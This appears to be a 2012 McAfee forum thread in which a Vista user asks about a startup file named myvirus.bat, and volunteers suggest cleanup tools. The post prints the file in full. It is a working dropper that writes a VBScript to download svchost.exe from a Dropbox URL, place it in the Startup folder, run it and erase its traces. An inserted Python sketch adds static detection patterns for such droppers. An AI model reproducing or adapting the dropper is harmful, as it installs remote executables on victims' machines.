5 Replies Latest reply on Jul 10, 2012 5:41 AM by Peter M

    Windows Script Host Error

      Hi,

       

      A few days ago, my Windows Vista 32 showed an error message when I turned on my computer. The error message is as below:

      wch.jpg

       

       

      After that, I asked my friend about this issue. He advised me to run msconfig and go to the Startup tab to see the entries that run when I start my PC.

      I tried looking for something with a ".vbs" extension but I did not find a process for a file with that extension. Instead, I found a process in c:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup\Myvirus.bat

       

      The contents of the file myvirus.bat look like this:

       

      function PreloadFiles takes nothing returns nothing

       

          call Preload( "")

      echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") > %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objXMLHTTP.open "GET", "https://dl.dropbox.com/s/5dg9ip1kog1v6f3/svchost.exe", false >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objXMLHTTP.send() >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo Set objADOStream = CreateObject("ADODB.Stream") >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Open >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Type = 1 >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Position = 0 >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo If objFSO.Fileexists("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\svchost.exe") Then objFSO.DeleteFile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\svchost.exe" >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.SaveToFile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\svchost.exe" >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Close >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo End if >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objFSO.DeleteFile "%TEMP%\\download.vbs" >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objFSO.DeleteFile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat" >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      start %TEMP%\\download.vbs

      //" )

          call PreloadEnd( 0.1 )

       

      endfunction

       

       

      I tried deleting the file, and the error no longer occurred. I want to ask: can I delete these myvirus.bat files? And what is the function of that file? Where does a file like that come from?

       

      Sorry if my English is not good...

       

      Thank you.
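
A static triage sketch for a startup batch file shaped like the one quoted above, added here as an example and not part of the original post or of any McAfee tool: it replays the `echo ... >` / `>>` redirections to rebuild the script the batch file would write, without running anything, and flags what that script does. The sample input is constructed, its URL is a placeholder, and the names `rebuild_dropped`, `triage` and the flag labels are assumptions of this example.

```python
import re

# Constructed sample in the shape of the quoted batch file (placeholder URL,
# wrapper lines such as 'call Preload( "")' are ignored by the parser).
SAMPLE = r'''
    call Preload( "")
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") > %TEMP%\\download.vbs
echo objXMLHTTP.open "GET", "https://example.invalid/payload.exe", false >> %TEMP%\\download.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %TEMP%\\download.vbs
echo objADOStream.SaveToFile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\svchost.exe" >> %TEMP%\\download.vbs
echo objFSO.DeleteFile "%TEMP%\\download.vbs" >> %TEMP%\\download.vbs
start %TEMP%\\download.vbs
'''

ECHO = re.compile(r'^\s*echo\s+(.*)\s(>>?)\s*(\S+)\s*$', re.I)
START = re.compile(r'^\s*start\s+(\S+)', re.I)
URL = re.compile(r'https?://[^\s"]+', re.I)
INDICATORS = {  # label -> pattern searched in the rebuilt script
    "http_download": re.compile(r'MSXML2\.XMLHTTP', re.I),
    "binary_write": re.compile(r'ADODB\.Stream', re.I),
    "startup_persistence": re.compile(r'SaveToFile\s+"[^"]*\\Startup\\', re.I),
    "self_delete": re.compile(r'DeleteFile', re.I),
}

def rebuild_dropped(batch_text):
    """Replay echo redirections: '>' truncates the target, '>>' appends."""
    files = {}
    for line in batch_text.splitlines():
        m = ECHO.match(line)
        if not m:
            continue  # not an 'echo ... > file' line
        content, op, target = m.group(1).rstrip(), m.group(2), m.group(3).lower()
        if op == ">":
            files[target] = []
        files.setdefault(target, []).append(content)
    return files

def triage(batch_text):
    """Summarise each file the batch would write and whether it launches it."""
    started = {m.group(1).lower() for l in batch_text.splitlines()
               if (m := START.match(l))}
    report = []
    for target, lines in rebuild_dropped(batch_text).items():
        body = "\n".join(lines)
        report.append({
            "dropped_file": target,
            "executed": target in started,
            "urls": URL.findall(body),
            "flags": sorted(k for k, rx in INDICATORS.items() if rx.search(body)),
        })
    return report
```
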

        • 1. Re: Windows Script Host Error
          Peter M

          Moved to the Malware section.  I trust this is Vista SP2 and fully updated?

           

          Look at the following page and try in this order, System Restore, Stinger and Malwarebytes Free and if all else fails the Hijackthis routine.

           

          All that with hints and download links is shown here:  https://community.mcafee.com/docs/DOC-2168

           

          myvirus.bat is a trojan according to a Google Search but be wary of some of the so-called cures out there.   Most seem to be from risky sources.

           

          Use SiteAdvisor and WoT as browser warnings against bad web sites.

           

          Message was edited by: Ex_Brit on 08/07/12 8:09:21 EDT AM
          • 2. Re: Windows Script Host Error

            Hi Ex_Brit....

             

            Thanks for your reply. I've tried the tools you suggested, but it seems that doing a restore point is the best way.

            • 3. Re: Windows Script Host Error
              Peter M

              Did it work?

              • 4. Re: Windows Script Host Error

                I do not know if this worked well, but in 2 days no process for the myvirus.bat file has been seen at startup.

                 

                Before doing the restore point, I tried scanning using tools such as the following:

                 

                GetSusp: the scan using this tool reported that 6 files are suspicious, and the scan results were automatically sent to the McAfee lab.

                The RootkitRemover tool, Stinger, Windows Defender and Malwarebytes, on the other hand, report that my PC is safe and clean of malicious files, but every time I turn on my computer there is always a pop-up from Windows Script Host reporting an error for the file download.vbs, and there is also a process at startup for myvirus.bat although I have deleted that file.

                 

                Before doing the restore point, I had time to scan using McAfee Total Protection, but there were no reports of viruses or trojans on my PC. This was different after I did the restore point: there were reports in McAfee Total Protection telling me that there are 3 trojans, and I don't know if the trojans are already deleted or not because there is no report on it.

                 

                Earlier (after doing the restore point), I tried opening Task Manager and saw that there are 3 processes for rundll32.exe. See the picture below:

                taskmanager.jpg

                 

                 

                Are these normal processes for rundll32.exe? If myvirus.bat is part of a trojan, why is there a message from Windows Script Host saying there is an error?

                 

                Thank you.

                • 5. Re: Windows Script Host Error
                  Peter M

                  I can't tell you what they represent except to say that I also have those same rundll processes showing in my Task Manager.

                   

                  Look in the link at the bottom of my signature and run Hijackthis, post its log on one of the forums represented there and they will analyse the log and tell you if anything nasty is still around.